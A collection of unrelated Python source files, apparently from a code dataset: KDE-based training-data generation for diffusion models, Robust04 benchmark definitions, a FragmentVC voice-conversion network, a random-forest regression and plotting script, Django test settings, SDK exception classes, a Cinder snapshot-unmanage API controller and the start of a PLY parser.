if len(params) == 4:
out[n_kde:(n_kde + n_unif_up), 2] = np.log(batch_fptd(out[n_kde:(n_kde + n_unif_up), 0] * out[n_kde:(n_kde + n_unif_up), 1] * (- 1),
params[0],
params[1] * 2,
params[2],
params[3]))
# If we have 5 parameters but analytic we know we need to use the ddm_sdv --> supply sdv value to batch_fptd
if len(params) == 5:
out[n_kde:(n_kde + n_unif_up), 2] = np.log(batch_fptd(out[n_kde:(n_kde + n_unif_up), 0] * out[n_kde:(n_kde + n_unif_up), 1] * (- 1),
params[0],
params[1] * 2,
params[2],
params[3],
params[4]))
# Get negative uniform part:
choice_tmp = np.random.choice(metadata['possible_choices'],
size = n_unif_down)
rt_tmp = np.random.uniform(low = - 1.0,
high = 0.0001,
size = n_unif_down)
out[(n_kde + n_unif_up):, 0] = rt_tmp
out[(n_kde + n_unif_up):, 1] = choice_tmp
out[(n_kde + n_unif_up):, 2] = -66.77497
if idx % 10 == 0:
print(idx)
return out.astype(np.float)
# We should be able to parallelize this !
def kde_from_simulations_fast_parallel(base_simulation_folder = '',
file_name_prefix = '',
file_id = 1,
target_folder = '',
n_by_param = 3000,
mixture_p = [0.8, 0.1, 0.1],
process_params = ['v', 'a', 'w', 'c1', 'c2'],
print_info = False,
n_processes = 'all',
analytic = False):
# Parallel
if n_processes == 'all':
n_cpus = psutil.cpu_count(logical = False)
else:
n_cpus = n_processes
print('Number of cpus: ')
print(n_cpus)
file_ = pickle.load(open( base_simulation_folder + '/' + file_name_prefix + '_' + str(file_id) + '.pickle', 'rb' ) )
stat_ = pickle.load(open( base_simulation_folder + '/simulator_statistics' + '_' + str(file_id) + '.pickle', 'rb' ) )
# Initialize dataframe
# Initializations
n_kde = int(n_by_param * mixture_p[0])
n_unif_down = int(n_by_param * mixture_p[1])
n_unif_up = int(n_by_param * mixture_p[2])
n_kde = n_kde + (n_by_param - n_kde - n_unif_up - n_unif_down) # correct n_kde if sum != n_by_param
# Add possible choices to file_[2] which is the meta data for the simulator (expected when loaded the kde class)
# TODO: THIS INFORMATION SHOULD BE INCLUDED AS META-DATA INTO THE BASE SIMULATOIN FILES
file_[2]['possible_choices'] = np.unique([-1, 1])
#file_[2]['possible_choices'] = np.unique(file_[1][0, :, 1])
file_[2]['possible_choices'].sort()
# CONTINUE HERE
# Preparation loop --------------------------------------------------------------------
#s_id_kde = np.sum(stat_['keep_file']) * (n_unif_down + n_unif_up)
cnt = 0
starmap_iterator = ()
tmp_sim_data_ok = 0
results = []
for i in range(file_[1].shape[0]):
if stat_['keep_file'][i]:
# Don't remember what this part is doing....
if tmp_sim_data_ok:
pass
else:
tmp_sim_data = file_[1][i]
tmp_sim_data_ok = 1
lb = cnt * (n_unif_down + n_unif_up + n_kde)
# Allocate to starmap tuple for mixture component 3
if analytic:
starmap_iterator += ((file_[1][i, :, :].copy(), file_[0][i, :].copy(), file_[2].copy(), n_kde, n_unif_up, n_unif_down, cnt), )
else:
starmap_iterator += ((file_[1][i, :, :], file_[2], n_kde, n_unif_up, n_unif_down, cnt), )
cnt += 1
if (cnt % 100 == 0) or (i == file_[1].shape[0] - 1):
with Pool(processes = n_cpus, maxtasksperchild = 200) as pool:
results.append(np.array(pool.starmap(make_kde_data, starmap_iterator)).reshape((-1, 3)))
starmap_iterator = ()
print(i, 'arguments generated')
if not stat_['keep_file'][i]:
if (i == (file_[1].shape[0] - 1)) and len(starmap_iterator) > 0:
with Pool(processes = n_cpus, maxtasksperchild = 200) as pool:
results.append(np.array(pool.starmap(make_kde_data, starmap_iterator)).reshape((-1, 3)))
starmap_iterator = ()
print(i, 'last dataset was not kept')
my_columns = process_params + ['rt', 'choice', 'log_l']
data = pd.DataFrame(np.zeros((np.sum(stat_['keep_file']) * n_by_param, len(my_columns))),
columns = my_columns)
data.values[:, -3:] = np.concatenate(results)
# Filling in training data frame ---------------------------------------------------
cnt = 0
tmp_sim_data_ok = 0
for i in range(file_[1].shape[0]):
if stat_['keep_file'][i]:
            # Keep a copy of the first retained simulation's data; it is written out as meta_data.pickle below
if tmp_sim_data_ok:
pass
else:
tmp_sim_data = file_[1][i]
tmp_sim_data_ok = 1
lb = cnt * (n_unif_down + n_unif_up + n_kde)
# Make empty dataframe of appropriate size
p_cnt = 0
for param in process_params:
data.iloc[(lb):(lb + n_unif_down + n_unif_up + n_kde), my_columns.index(param)] = file_[0][i, p_cnt]
p_cnt += 1
cnt += 1
# ----------------------------------------------------------------------------------
# Store data
print('writing data to file: ', target_folder + '/data_' + str(file_id) + '.pickle')
pickle.dump(data.values, open(target_folder + '/data_' + str(file_id) + '.pickle', 'wb'), protocol = 4)
#data.to_pickle(target_folder + '/data_' + str(file_id) + '.pickle' , protocol = 4)
# Write metafile if it doesn't exist already
# Hack for now: Just copy one of the base simulations files over
if os.path.isfile(target_folder + '/meta_data.pickle'):
pass
else:
pickle.dump(tmp_sim_data, open(target_folder + '/meta_data.pickle', 'wb') )
return 0 #data
# UNUSED FROM PREV FUNCTION
# Garbage collection before starting pool:
# del file_
# gc.collect()
# if analytic:
# with Pool(processes = n_cpus, maxtasksperchild = 200) as pool:
# #result = np.array(pool.starmap(make_fptd_data, starmap_iterator)) #.reshape((-1, 3))
# result = pool.starmap(make_fptd_data, starmap_iterator)
# else:
# with Pool(processes = n_cpus, maxtasksperchild = 200) as pool:
# #result = np.array(pool.starmap(make_kde_data, starmap_iterator)) #.reshape((-1, 3))
# result = pool.starmap(make_kde_data, starmap_iterator)
# result = np.array(result).reshape((-1, 3))
# Make dataframe to save
# Initialize dataframe
def kde_from_simulations_fast(base_simulation_folder = '',
file_name_prefix = '',
file_id = 1,
target_folder = '',
n_by_param = 3000,
mixture_p = [0.8, 0.1, 0.1],
process_params = ['v', 'a', 'w', 'c1', 'c2'],
print_info = False
):
file_ = pickle.load(open( base_simulation_folder + '/' + file_name_prefix + '_' + str(file_id) + '.pickle', 'rb' ) )
stat_ = pickle.load(open( base_simulation_folder + '/simulator_statistics' + '_' + str(file_id) + '.pickle', 'rb' ) )
# Initialize dataframe
my_columns = process_params + ['rt', 'choice', 'log_l']
data = pd.DataFrame(np.zeros((np.sum(stat_['keep_file']) * n_by_param, len(my_columns))),
columns = my_columns)
n_kde = int(n_by_param * mixture_p[0])
n_unif_down = int(n_by_param * mixture_p[1])
n_unif_up = int(n_by_param * mixture_p[2])
n_kde = n_kde + (n_by_param - n_kde - n_unif_up - n_unif_down) # correct n_kde if sum != n_by_param
    # Add possible choices to file_[2], which holds the simulator meta data (expected when loading the kde class)
    # TODO: THIS INFORMATION SHOULD BE INCLUDED AS META-DATA IN THE BASE SIMULATION FILES
file_[2]['possible_choices'] = np.unique([-1,1])
#file_[2]['possible_choices'] = np.unique(file_[1][0, :, 1])
file_[2]['possible_choices'].sort()
# CONTINUE HERE
# Main while loop --------------------------------------------------------------------
#row_cnt = 0
cnt = 0
for i in range(file_[1].shape[0]):
if stat_['keep_file'][i]:
# Read in simulator file
tmp_sim_data = file_[1][i]
lb = cnt * n_by_param
# Make empty dataframe of appropriate size
p_cnt = 0
for param in process_params:
data.iloc[(lb):(lb + n_by_param), my_columns.index(param)] = file_[0][i, p_cnt] #tmp_sim_data[2][param]
p_cnt += 1
# MIXTURE COMPONENT 1: Get simulated data from kde -------------------------------
tmp_kde = kde_class.logkde((file_[1][i, :, 0], file_[1][i, :, 1], file_[2])) #[tmp_sim_data)
tmp_kde_samples = tmp_kde.kde_sample(n_samples = n_kde)
data.iloc[lb:(lb + n_kde), my_columns.index('rt')] = tmp_kde_samples[0].ravel()
data.iloc[lb:(lb + n_kde), my_columns.index('choice')] = tmp_kde_samples[1].ravel()
data.iloc[lb:(lb + n_kde), my_columns.index('log_l')] = tmp_kde.kde_eval(data = tmp_kde_samples).ravel()
# --------------------------------------------------------------------------------
# MIXTURE COMPONENT 2: Negative uniform part -------------------------------------
choice_tmp = np.random.choice(file_[2]['possible_choices'], #['possible_choices'],
size = n_unif_down)
rt_tmp = np.random.uniform(low = - 1,
high = 0.0001,
size = n_unif_down)
data.iloc[(lb + n_kde):(lb + n_kde + n_unif_down), my_columns.index('rt')] = rt_tmp
data.iloc[(lb + n_kde):(lb + n_kde + n_unif_down), my_columns.index('choice')] = choice_tmp
data.iloc[(lb + n_kde):(lb + n_kde + n_unif_down), my_columns.index('log_l')] = -66.77497 # the number corresponds to log(1e-29)
# ---------------------------------------------------------------------------------
# MIXTURE COMPONENT 3: Positive uniform part --------------------------------------
choice_tmp = np.random.choice(file_[2]['possible_choices'],
size = n_unif_up)
if file_[2]['max_t'] < 100:
rt_tmp = np.random.uniform(low = 0.0001,
high = file_[2]['max_t'],
size = n_unif_up)
else:
rt_tmp = np.random.uniform(low = 0.0001,
high = 100,
size = n_unif_up)
data.iloc[(lb + n_kde + n_unif_down):(lb + n_by_param), my_columns.index('rt')] = rt_tmp
data.iloc[(lb + n_kde + n_unif_down):(lb + n_by_param), my_columns.index('choice')] = choice_tmp
data.iloc[(lb + n_kde + n_unif_down):(lb + n_by_param), my_columns.index('log_l')] = tmp_kde.kde_eval(data = (rt_tmp, choice_tmp))
# ----------------------------------------------------------------------------------
cnt += 1
if i % 10 == 0:
print(i, 'kdes generated')
# -----------------------------------------------------------------------------------
# Store data
print('writing data to file: ', target_folder + '/data_' + str(file_id) + '.pickle')
pickle.dump(data.values, open(target_folder + '/data_' + str(file_id) + '.pickle', 'wb'), protocol = 4)
# Write metafile if it doesn't exist already
# Hack for now: Just copy one of the base simulations files over
if os.path.isfile(target_folder + '/meta_data.pickle'):
pass
else:
pickle.dump(tmp_sim_data, open(target_folder + '/meta_data.pickle', 'wb') )
return data
def kde_load_data_new(path = '',
file_id_list = '',
prelog_cutoff_low = 1e-29,
prelog_cutoff_high = 100,
n_samples_by_dataset = 10000000,
return_log = True,
make_split = True,
val_p = 0.01):
# Read in two datasets to get meta data for the subsequent
print('Reading in initial dataset')
tmp_data = np.load(path + file_id_list[0], allow_pickle = True)
# Collect some meta data
n_files = len(file_id_list)
print('n_files: ', n_files)
print('n_samples_by_dataset: ', n_samples_by_dataset)
# Allocate memory for data
print('Allocating data arrays')
features = np.zeros((n_files * n_samples_by_dataset, tmp_data.shape[1] - 1))
labels = np.zeros((n_files * n_samples_by_dataset, 1))
# Read in data of initialization files
cnt_samples = tmp_data.shape[0]
features[:cnt_samples, :] = tmp_data[:, :-1]
labels[:cnt_samples, 0] = tmp_data[:, -1]
# Read in remaining files into preallocated np.array
for i in range(1, n_files, 1):
tmp_data = np.load(path + file_id_list[i], allow_pickle = True)
n_rows_tmp = tmp_data.shape[0]
features[(cnt_samples): (cnt_samples + n_rows_tmp), :] = tmp_data[:, :-1]
labels[(cnt_samples): (cnt_samples + n_rows_tmp), 0] = tmp_data[:, -1]
cnt_samples += n_rows_tmp
print(i, ' files processed')
features.resize((cnt_samples, features.shape[1]), refcheck = False)
labels.resize((cnt_samples, labels.shape[1]), refcheck = False)
print('new n rows features: ', features.shape[0])
print('new n rows labels: ', labels.shape[0])
if prelog_cutoff_low != 'none':
labels[labels < np.log(prelog_cutoff_low)] = np.log(prelog_cutoff_low)
if prelog_cutoff_high != 'none':
labels[labels > np.log(prelog_cutoff_high)] = np.log(prelog_cutoff_high)
if return_log == False:
labels = np.exp(labels)
if make_split:
# Making train test split
print('Making train test split...')
train_idx = np.random.choice(a = [False, True], size = cnt_samples, p = [val_p, 1 - val_p])
test_idx = np.invert(train_idx)
return ((features[train_idx, :], labels[train_idx, :]), (features[test_idx, :], labels[test_idx, :]))
else:
return features, labels
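if __name__ == '__main__':
    # Minimal end-to-end sketch, added for illustration only: the folder names, file
    # prefix, file ids and parameter-name list below are hypothetical and depend on
    # how the base simulation files were generated.
    # 1) Turn one base-simulation file into KDE-based training data:
    kde_from_simulations_fast_parallel(base_simulation_folder = 'data/base_simulations',
                                       file_name_prefix = 'ddm_base_simulations',
                                       file_id = 1,
                                       target_folder = 'data/train_data',
                                       n_by_param = 3000,
                                       mixture_p = [0.8, 0.1, 0.1],
                                       process_params = ['v', 'a', 'w'],
                                       n_processes = 'all',
                                       analytic = False)
    # 2) Load the generated file(s) and build a train / validation split:
    (train_f, train_l), (val_f, val_l) = kde_load_data_new(path = 'data/train_data/',
                                                           file_id_list = ['data_1.pickle'],
                                                           n_samples_by_dataset = 3000000,
                                                           val_p = 0.01)
    print('train features:', train_f.shape, ' val features:', val_f.shape)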
|
py | 1a4ba77dcae58cef73a46f660acfbfdb3c356a7b | from capreolus import Dependency, constants
from . import Benchmark
PACKAGE_PATH = constants["PACKAGE_PATH"]
@Benchmark.register
class Robust04(Benchmark):
"""Robust04 benchmark using the title folds from Huston and Croft. [1] Each of these is used as the test set.
Given the remaining four folds, we split them into the same train and dev sets used in recent work. [2]
[1] Samuel Huston and W. Bruce Croft. 2014. Parameters learned in the comparison of retrieval models using term dependencies. Technical Report.
[2] Sean MacAvaney, Andrew Yates, Arman Cohan, Nazli Goharian. 2019. CEDR: Contextualized Embeddings for Document Ranking. SIGIR 2019.
"""
module_name = "robust04"
dependencies = [Dependency(key="collection", module="collection", name="robust04")]
qrel_file = PACKAGE_PATH / "data" / "qrels.robust2004.txt"
topic_file = PACKAGE_PATH / "data" / "topics.robust04.301-450.601-700.txt"
fold_file = PACKAGE_PATH / "data" / "rob04_cedr_folds.json"
query_type = "title"
@Benchmark.register
class Robust04Yang19(Benchmark):
"""Robust04 benchmark using the folds from Yang et al. [1]
[1] Wei Yang, Kuang Lu, Peilin Yang, and Jimmy Lin. 2019. Critically Examining the "Neural Hype": Weak Baselines and the Additivity of Effectiveness Gains from Neural Ranking Models. SIGIR 2019.
"""
module_name = "robust04.yang19"
dependencies = [Dependency(key="collection", module="collection", name="robust04")]
qrel_file = PACKAGE_PATH / "data" / "qrels.robust2004.txt"
topic_file = PACKAGE_PATH / "data" / "topics.robust04.301-450.601-700.txt"
fold_file = PACKAGE_PATH / "data" / "rob04_yang19_folds.json"
query_type = "title"
@Benchmark.register
class Robust04Yang19Desc(Robust04Yang19, Benchmark):
module_name = "robust04.yang19.desc"
query_type = "desc"
|
py | 1a4ba7bc74c31f161a659870c26ed51605f2069d | """FragmentVC model architecture."""
from typing import Tuple, List, Optional
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor
from .convolutional_transformer import Smoother, Extractor
class FragmentVC(nn.Module):
"""
FragmentVC uses Wav2Vec feature of the source speaker to query and attend
on mel spectrogram of the target speaker.
"""
def __init__(self, d_model=512):
super().__init__()
self.unet = UnetBlock(d_model)
self.smoothers = nn.TransformerEncoder(Smoother(d_model, 2, 1024), num_layers=3)
self.mel_linear = nn.Linear(d_model, 80)
self.post_net = nn.Sequential(
nn.Conv1d(80, 512, kernel_size=5, padding=2),
nn.BatchNorm1d(512),
nn.Tanh(),
nn.Dropout(0.5),
nn.Conv1d(512, 512, kernel_size=5, padding=2),
nn.BatchNorm1d(512),
nn.Tanh(),
nn.Dropout(0.5),
nn.Conv1d(512, 512, kernel_size=5, padding=2),
nn.BatchNorm1d(512),
nn.Tanh(),
nn.Dropout(0.5),
nn.Conv1d(512, 512, kernel_size=5, padding=2),
nn.BatchNorm1d(512),
nn.Tanh(),
nn.Dropout(0.5),
nn.Conv1d(512, 80, kernel_size=5, padding=2),
nn.BatchNorm1d(80),
nn.Dropout(0.5),
)
def forward(
self,
srcs: Tensor,
refs: Tensor,
refs_features: Optional[Tensor] = None,
src_masks: Optional[Tensor] = None,
ref_masks: Optional[Tensor] = None,
) -> Tuple[Tensor, List[Optional[Tensor]]]:
"""Forward function.
Args:
srcs: (batch, src_len, 768)
src_masks: (batch, src_len)
refs: (batch, 80, ref_len)
refs_features: (batch, ref_len, 768)
ref_masks: (batch, ref_len)
"""
# out: (src_len, batch, d_model)
out, attns = self.unet(srcs, refs, refs_features=refs_features, src_masks=src_masks, ref_masks=ref_masks)
# out: (src_len, batch, d_model)
out = self.smoothers(out, src_key_padding_mask=src_masks)
# out: (src_len, batch, 80)
out = self.mel_linear(out)
# out: (batch, 80, src_len)
out = out.transpose(1, 0).transpose(2, 1)
refined = self.post_net(out)
out = out + refined
# out: (batch, 80, src_len)
return out, attns
class UnetBlock(nn.Module):
"""Hierarchically attend on references."""
def __init__(self, d_model: int):
super(UnetBlock, self).__init__()
self.conv1 = nn.Conv1d(80, d_model, 3, padding=1, padding_mode="replicate")
self.conv2 = nn.Conv1d(d_model, d_model, 3, padding=1, padding_mode="replicate")
self.conv3 = nn.Conv1d(d_model, d_model, 3, padding=1, padding_mode="replicate")
self.prenet = nn.Sequential(
nn.Linear(768, 768), nn.ReLU(), nn.Linear(768, d_model),
)
self.features_prenet = nn.Sequential(
nn.Linear(768, 768), nn.ReLU(), nn.Linear(768, d_model),
)
self.extractor1 = Extractor(d_model, 2, 1024, no_residual=True)
self.extractor2 = Extractor(d_model, 2, 1024)
self.extractor3 = Extractor(d_model, 2, 1024)
def forward(
self,
srcs: Tensor,
refs: Tensor,
refs_features: Optional[Tensor] = None,
src_masks: Optional[Tensor] = None,
ref_masks: Optional[Tensor] = None,
) -> Tuple[Tensor, List[Optional[Tensor]]]:
"""Forward function.
Args:
srcs: (batch, src_len, 768)
src_masks: (batch, src_len)
refs: (batch, 80, ref_len)
refs_features: (batch, ref_len, 768)
ref_masks: (batch, ref_len)
"""
# tgt: (batch, tgt_len, d_model)
tgt = self.prenet(srcs)
refs_features = None if refs_features is None else self.features_prenet(refs_features)
# tgt: (tgt_len, batch, d_model)
tgt = tgt.transpose(0, 1)
# ref*: (batch, d_model, mel_len)
ref1 = self.conv1(refs)
ref2 = self.conv2(F.relu(ref1))
ref3 = self.conv3(F.relu(ref2))
# out*: (tgt_len, batch, d_model)
out, attn1 = self.extractor1(
tgt,
ref3.transpose(1, 2).transpose(0, 1),
memory_features=refs_features.transpose(0, 1),
tgt_key_padding_mask=src_masks,
memory_key_padding_mask=ref_masks,
)
out, attn2 = self.extractor2(
out,
ref2.transpose(1, 2).transpose(0, 1),
tgt_key_padding_mask=src_masks,
memory_key_padding_mask=ref_masks,
)
out, attn3 = self.extractor3(
out,
ref1.transpose(1, 2).transpose(0, 1),
tgt_key_padding_mask=src_masks,
memory_key_padding_mask=ref_masks,
)
# out: (tgt_len, batch, d_model)
return out, [attn1, attn2, attn3]
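if __name__ == "__main__":
    # Smoke-test sketch (added for illustration; not part of the original file):
    # run a forward pass with randomly generated tensors shaped as documented in
    # FragmentVC.forward(). Batch size, sequence lengths and the use of random data
    # are assumptions made only for this example.
    import torch

    model = FragmentVC(d_model=512)
    srcs = torch.randn(2, 100, 768)           # (batch, src_len, 768) Wav2Vec features of the source
    refs = torch.randn(2, 80, 250)            # (batch, 80, ref_len) target mel spectrogram
    refs_features = torch.randn(2, 250, 768)  # (batch, ref_len, 768) Wav2Vec features of the reference
    out, attns = model(srcs, refs, refs_features=refs_features)
    print(out.shape)   # (batch, 80, src_len), e.g. torch.Size([2, 80, 100])
    print(len(attns))  # three attention maps, one per Extractor level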
|
py | 1a4ba7c00dee2acb3461f30e41d512d9b2a15012 | import argparse
import matplotlib.pyplot as plt
import numpy as np
from joblib import dump
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error
descript = """Using parameters to edit OpenFOAM parameters"""
parser = argparse.ArgumentParser(description=descript)
parser.add_argument("-workspace", help="The DAG spec root")
args = parser.parse_args()
training_percent = 0.6
timestep = -1
fontsize = 20
WORKSPACE = args.workspace
inputs_dir = WORKSPACE + "/merlin_info"
outputs_dir = WORKSPACE + "/combine_outputs"
outputs = np.load(outputs_dir + "/data.npz")
U = outputs["arr_0"]
enstrophy = outputs["arr_1"]
energy_byhand = np.sum(np.sum(U ** 2, axis=3), axis=2) / U.shape[2] / 2
enstrophy_all = np.sum(enstrophy, axis=2)
X = np.load(inputs_dir + "/samples.npy")
y = np.concatenate(
(
enstrophy_all[:, timestep].reshape(-1, 1),
energy_byhand[:, timestep].reshape(-1, 1),
),
axis=1,
)
X[:, 1] = np.log10(X[:, 0] / X[:, 1]) # np.log10(X)
y = np.log10(y)
training_size = int(training_percent * len(X))
X_train = X[:training_size]
y_train = y[:training_size]
X_test = X[training_size:]
y_test = y[training_size:]
regr = RandomForestRegressor(max_depth=10, random_state=0, n_estimators=7)
regr.fit(X_train, y_train)
print("training score:", regr.score(X_train, y_train))
print("testing score: ", regr.score(X_test, y_test))
print(mean_squared_error(y_test, regr.predict(X_test)))
dump(regr, "trained_model.joblib")
fig, ax = plt.subplots(3, 2, figsize=(25, 25), constrained_layout=True)
plt.rcParams.update({"font.size": 25})
plt.rcParams["lines.linewidth"] = 5
x = np.linspace(-5, 8, 100)
y1 = 1 * x
ax[0][0].plot(x, y1, "-r", label="y=x", linewidth=1)
y_pred = regr.predict(X_train)
ax[0][0].scatter(y_train[:, 0], y_pred[:, 0], label="Log10 Enstrophy")
ax[0][0].scatter(y_train[:, 1], y_pred[:, 1], label="Log10 Energy")
ax[0][0].set_title("Velocity Magnitude %s" % timestep)
ax[0][0].set_xlabel("Actual", fontsize=fontsize)
ax[0][0].set_ylabel("Predicted", fontsize=fontsize)
ax[0][0].set_title("Training Data, # Points: %s" % len(y_pred))
ax[0][0].legend()
ax[0][0].grid()
x_min = np.min([np.min(y_train[:, 0]), np.min(y_train[:, 1])])
y_min = np.min([np.min(y_pred[:, 0]), np.min(y_pred[:, 1])])
x_max = np.max([np.max(y_train[:, 0]), np.max(y_train[:, 1])])
y_max = np.max([np.max(y_pred[:, 0]), np.max(y_pred[:, 1])])
y_pred = regr.predict(X_test)
ax[0][1].plot(x, y1, "-r", label="y=x", linewidth=1)
ax[0][1].scatter(y_test[:, 0], y_pred[:, 0], label="Log10 Enstrophy")
ax[0][1].scatter(y_test[:, 1], y_pred[:, 1], label="Log10 Energy")
ax[0][1].set_xlabel("Actual", fontsize=fontsize)
ax[0][1].set_ylabel("Predicted", fontsize=fontsize)
ax[0][1].set_title("Testing Data, # Points: %s" % len(y_pred))
ax[0][1].legend()
ax[0][1].grid()
x_min = np.min([np.min(y_test[:, 0]), np.min(y_test[:, 1]), x_min]) - 0.1
y_min = np.min([np.min(y_pred[:, 0]), np.min(y_pred[:, 1]), y_min]) - 0.1
x_max = np.max([np.max(y_test[:, 0]), np.max(y_test[:, 1]), x_max]) + 0.1
y_max = np.max([np.max(y_pred[:, 0]), np.max(y_pred[:, 1]), y_max]) + 0.1
ax[0][0].set_xlim([x_min, x_max])
ax[0][0].set_ylim([y_min, y_max])
ax[0][1].set_xlim([x_min, x_max])
ax[0][1].set_ylim([y_min, y_max])
y_pred_all = regr.predict(X)
input_enstrophy = ax[1][1].scatter(X[:, 0], 10 ** y[:, 1], s=100, edgecolors="black")
ax[1][1].set_xlabel(r"Lidspeed ($\frac{m}{s}$)", fontsize=fontsize)
ax[1][1].set_ylabel(r"$Energy$", fontsize=fontsize)
ax[1][1].set_title("Average Energy Variation with Lidspeed")
ax[1][1].grid()
input_energy = ax[1][0].scatter(
X[:, 0],
X[:, 1],
s=100,
edgecolors="black",
c=10 ** y[:, 1],
cmap=plt.get_cmap("viridis"),
)
ax[1][0].set_xlabel(r"Lidspeed ($\frac{m}{s}$)", fontsize=fontsize)
ax[1][0].set_ylabel(r"$Log_{10}$(Reynolds Number)", fontsize=fontsize)
ax[1][0].set_title("Inputs vs Average Energy")
ax[1][0].grid()
cbar = plt.colorbar(input_energy, ax=ax[1][0])
cbar.ax.set_ylabel(r"$Energy$", rotation=270, labelpad=30)
ax[1][0].tick_params(axis="both", which="major", labelsize=fontsize)
ax[1][1].tick_params(axis="both", which="major", labelsize=fontsize)
ax[1][0].tick_params(axis="both", which="major", labelsize=fontsize)
ax[1][1].tick_params(axis="both", which="major", labelsize=fontsize)
y_pred_all = regr.predict(X)
input_enstrophy = ax[2][0].scatter(
X[:, 0],
X[:, 1],
s=100,
edgecolors="black",
c=y[:, 0] - y_pred_all[:, 0],
cmap=plt.get_cmap("Spectral"),
)
ax[2][0].set_xlabel(r"Lidspeed ($\frac{m}{s}$)", fontsize=fontsize)
ax[2][0].set_ylabel(r"$Log_{10}$(Reynolds Number)", fontsize=fontsize)
ax[2][0].set_title("Inputs vs Enstrophy error")
ax[2][0].grid()
cbar = plt.colorbar(input_enstrophy, ax=ax[2][0])
cbar.ax.set_ylabel(r"$y_{act} - y_{pred}$", rotation=270, labelpad=30)
input_energy = ax[2][1].scatter(
X[:, 0],
X[:, 1],
s=100,
edgecolors="black",
c=y[:, 1] - y_pred_all[:, 1],
cmap=plt.get_cmap("Spectral"),
)
ax[2][1].set_xlabel(r"Lidspeed ($\frac{m}{s}$)", fontsize=fontsize)
ax[2][1].set_ylabel(r"$Log_{10}$(Reynolds Number)", fontsize=fontsize)
ax[2][1].set_title("Inputs vs Energy error")
ax[2][1].grid()
cbar = plt.colorbar(input_energy, ax=ax[2][1])
cbar.ax.set_ylabel(r"$y_{act} - y_{pred}$", rotation=270, labelpad=30)
ax[0][0].tick_params(axis="both", which="major", labelsize=fontsize)
ax[0][1].tick_params(axis="both", which="major", labelsize=fontsize)
ax[2][0].tick_params(axis="both", which="major", labelsize=fontsize)
ax[2][1].tick_params(axis="both", which="major", labelsize=fontsize)
plt.savefig("prediction.png")
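# Re-use sketch (added for illustration): reload the regressor saved above and query it
# for a new design point. Column 0 is the lidspeed sample and column 1 is the
# log10(X[:, 0] / X[:, 1]) ratio computed earlier (the "Log10(Reynolds Number)" axis);
# the concrete query values here are made up.
from joblib import load

loaded_regr = load("trained_model.joblib")
query_point = np.array([[10.0, 4.5]])  # [lidspeed, log10 Reynolds-style ratio]
pred_log_enstrophy, pred_log_energy = loaded_regr.predict(query_point)[0]
print("predicted enstrophy:", 10 ** pred_log_enstrophy)
print("predicted energy:   ", 10 ** pred_log_energy)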
|
py | 1a4ba8e3e18d6223227d879810470798ea2cc72e | DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = (
'templated_email',
)
SECRET_KEY = "notimportant"
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
|
py | 1a4ba8f7a80692080391d684be13c46ee220afcf | """Defines a common set of exceptions which developers can raise and/or catch."""
class ConfigValidationError(Exception):
"""Raised when a user's config settings fail validation."""
class FatalAPIError(Exception):
"""Exception raised when a failed request should not be considered retriable."""
class InvalidStreamSortException(Exception):
"""Exception to raise if sorting errors are found while syncing the records."""
class MapExpressionError(Exception):
"""Failed map expression evaluation."""
class MaxRecordsLimitException(Exception):
"""Exception to raise if the maximum number of allowable records is exceeded."""
class RecordsWitoutSchemaException(Exception):
"""Raised if a target receives RECORD messages prior to a SCHEMA message."""
class RetriableAPIError(Exception):
"""Exception raised when a failed request can be safely retried."""
class StreamMapConfigError(Exception):
"""Raised when a stream map has an invalid configuration."""
class TapStreamConnectionFailure(Exception):
"""Exception to raise when stream connection fails or stream is disconnected."""
class TooManyRecordsException(Exception):
"""Exception to raise when query returns more records than max_records."""
|
py | 1a4ba93291fbcec21c7f125dbef56db757424aa9 | # Copyright 2015 Huawei Technologies Co., Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from six.moves import http_client
import webob
from webob import exc
from cinder.api import extensions
from cinder.api.openstack import wsgi
from cinder import exception
from cinder.policies import manageable_snapshots as policy
from cinder import volume
LOG = logging.getLogger(__name__)
class SnapshotUnmanageController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(SnapshotUnmanageController, self).__init__(*args, **kwargs)
self.volume_api = volume.API()
@wsgi.response(http_client.ACCEPTED)
@wsgi.action('os-unmanage')
def unmanage(self, req, id, body):
"""Stop managing a snapshot.
This action is very much like a delete, except that a different
method (unmanage) is called on the Cinder driver. This has the effect
of removing the snapshot from Cinder management without actually
removing the backend storage object associated with it.
There are no required parameters.
A Not Found error is returned if the specified snapshot does not exist.
"""
context = req.environ['cinder.context']
LOG.info("Unmanage snapshot with id: %s", id)
try:
snapshot = self.volume_api.get_snapshot(context, id)
context.authorize(policy.UNMANAGE_POLICY, target_obj=snapshot)
self.volume_api.delete_snapshot(context, snapshot,
unmanage_only=True)
# Not found exception will be handled at the wsgi level
except exception.InvalidSnapshot as ex:
raise exc.HTTPBadRequest(explanation=ex.msg)
return webob.Response(status_int=http_client.ACCEPTED)
class Snapshot_unmanage(extensions.ExtensionDescriptor):
"""Enable volume unmanage operation."""
name = "SnapshotUnmanage"
alias = "os-snapshot-unmanage"
updated = "2014-12-31T00:00:00+00:00"
def get_controller_extensions(self):
controller = SnapshotUnmanageController()
extension = extensions.ControllerExtension(self, 'snapshots',
controller)
return [extension]
|
py | 1a4ba9fec94ee20e8bec8f9ebc8c84b515a18d63 | # GRUPO 5
# 201213062 - Mónica Raquel Calderon Muñoz
# 201213223 - Astrid Edith Hernandez Gonzalez
# 201213255 - Leonel Eduardo Avila Calvillo
# 201220159 - Diego Ahtohil Noj Armira
# 201220165 - Oscar Rolando Bernard Peralta
# IMPORT SECTION
import ply.lex as lex
import ply.yacc as yacc
from Expresiones import *
from Instrucciones import *
from Retorno import Retorno
